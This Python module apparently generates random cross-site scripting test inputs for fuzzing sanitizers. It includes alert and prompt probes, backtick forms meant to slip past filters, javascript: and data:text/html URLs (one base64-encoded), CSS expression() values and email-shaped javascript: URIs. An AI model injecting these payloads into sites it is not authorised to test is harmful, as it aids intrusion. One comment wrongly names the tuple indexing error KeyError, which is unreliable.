from random import randint
def gen_text():
    """Return one randomly chosen JavaScript dialog probe as a string.

    Every candidate only references ``alert``, ``prompt`` or ``confirm``
    with a constant argument, so a probe that runs is visible and does
    nothing else.  The candidates wrapped in double quotes are plain string
    literals unless the surrounding context breaks the quoting.

    NOTE(review): this table equals the first nine entries of
    ``gen_javascript``; keep the two in sync or share one table.
    NOTE(review): selection uses the module-level ``random`` state, so seed
    it in the caller if a test run has to be reproducible.
    """
    # \x60 is a backtick: the template-literal call form, which a filter
    # that only looks for "name(" does not match.
    probes = (
        'alert(0)',
        'prompt\x600\x60',
        '"confirm\x600\x60"',
        'window["alert"](0)',
        'window["prompt"](0)',
        'window["confirm"](0)',
        '"alert\x600\x60"',
        '"prompt\x600\x60"',
        '"alert(1)"',
    )
    # randint is inclusive at both ends, hence the -1.
    pick = randint(0, len(probes) - 1)
    return probes[pick]
def gen_boolean():
    """Return a random JavaScript literal, as source text, for a boolean slot.

    The table mixes the two boolean keywords with the values that are
    commonly coerced to a boolean: ``1``/``0``, ``null``, ``undefined``, the
    empty string, an empty array and an empty object.
    """
    literals = (
        'true',
        'false',
        '1',
        '0',
        'null',
        'undefined',
        '""',
        '[]',
        '{}',
    )
    # randint is inclusive at both ends, hence the -1.
    pick = randint(0, len(literals) - 1)
    return literals[pick]
def gen_number():
    """Return a random numeric literal, as source text.

    The table covers the different spellings a parser has to accept:
    plain integers, decimals, hexadecimal (``0x``), binary (``0b``), octal
    (``0o``) and exponent notation with a positive and a negative exponent.
    """
    literals = (
        '0',
        '1',
        '0.1',
        '1.1',
        '0x1',
        '0b1',
        '0o1',
        '1e1',
        '1e-1',
    )
    # randint is inclusive at both ends, hence the -1.
    pick = randint(0, len(literals) - 1)
    return literals[pick]
def gen_color():
    """Return a random six-digit ``#rrggbb`` colour string.

    All nine values are well-formed hex colours; none of them carries
    script content.
    """
    colours = (
        '#000000',
        '#ffffff',
        '#ff0000',
        '#00ff00',
        '#0000ff',
        '#ffff00',
        '#00ffff',
        '#ff00ff',
        '#c0c0c0',
    )
    # randint is inclusive at both ends, hence the -1.
    pick = randint(0, len(colours) - 1)
    return colours[pick]
def gen_javascript():
    """Return one randomly chosen JavaScript probe for a script context.

    The first nine entries are the dialog probes also returned by
    ``gen_text``.  The last three additionally end in an open line comment,
    end in an open block comment, or wrap the call in braces.

    NOTE(review): presumably the comment-terminated forms are meant to
    neutralise whatever the page appends after the injected value; confirm
    against the caller.
    NOTE(review): selection uses the module-level ``random`` state, so seed
    it in the caller if a test run has to be reproducible.
    """
    # \x60 is a backtick: the template-literal call form, which a filter
    # that only looks for "name(" does not match.
    probes = (
        'alert(0)',
        'prompt\x600\x60',
        '"confirm\x600\x60"',
        'window["alert"](0)',
        'window["prompt"](0)',
        'window["confirm"](0)',
        '"alert\x600\x60"',
        '"prompt\x600\x60"',
        '"alert(1)"',
        'console.log(alert(1))//',
        'console.log(alert(1))/*',
        '{1:alert(1)}',
    )
    # randint is inclusive at both ends, hence the -1.
    pick = randint(0, len(probes) - 1)
    return probes[pick]
def gen_style():
    """Return a random CSS value that tries to reach script through a style.

    The table holds a ``javascript:`` URL inside ``background-image`` and
    two spellings of the ``expression(...)`` construct.

    NOTE(review): ``expression()`` is a legacy Internet Explorer feature and
    current browsers do not run ``javascript:`` image URLs, so a sanitizer
    that passes these in a modern browser is not thereby shown to be safe;
    assert on the sanitized output as well as on runtime behaviour.
    """
    # xss via style
    style_values = (
        'background-image:url("javascript:alert(1)")',
        'expression(alert(1))',
        'expression\x600\x60',
    )
    # randint is inclusive at both ends, hence the -1.
    pick = randint(0, len(style_values) - 1)
    return style_values[pick]
def gen_url():
    """Return a random URL whose scheme carries script instead of a location.

    One entry uses the ``javascript:`` scheme and three use ``data:text/html``
    documents.  A URL check that only rejects ``javascript:`` lets the
    ``data:`` entries through, so an allow-list of schemes is the control
    these values exercise.
    """
    # xss via url
    urls = (
        'javascript:alert(1)',
        'data:text/html,<script>alert(1)</script>',
        # base64 of "<script>alert(1)</script>": same document as the entry
        # above, but invisible to a plain substring match on "<script".
        'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==',
        'data:text/html,<script>alert\x600\x60</script>',
    )
    # randint is inclusive at both ends, hence the -1.
    pick = randint(0, len(urls) - 1)
    return urls[pick]
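def gen_email():
    """Return a random email-field value that embeds a ``javascript:`` URI.

    Each entry places the URI directly before or after an ``@`` sign, so the
    value contains the character an email field expects without being a
    valid address.

    Returns:
        One of the three strings in the table below.
    """
    # xss via email
    addresses = (
        '@javascript:alert(1)',
        'javascript:alert(1)@',
        '@javascript:alert\x600\x60',
    )
    # The index is bounded by the table length.  The upper bound used to be
    # a hard-coded 3 against a three-entry table (valid indexes 0..2), which
    # raised KeyError on roughly one call in four.  randint is inclusive at
    # both ends, hence the -1.
    pick = randint(0, len(addresses) - 1)
    return addresses[pick]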
def gen_date():
    """Return the empty string.

    NOTE(review): this looks like a placeholder; unlike the other
    generators in this file it has no table of test values.
    """
    return ""